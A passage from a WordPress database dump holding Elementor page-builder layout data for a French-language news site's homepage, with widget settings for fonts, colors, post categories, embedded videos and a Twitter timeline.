f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2419,773,'_elementor_version','0.4'),(2420,773,'_elementor_css','a:3:{s:4:\"time\";i:1509378870;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2422,775,'_elementor_edit_mode','builder'),(2423,775,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\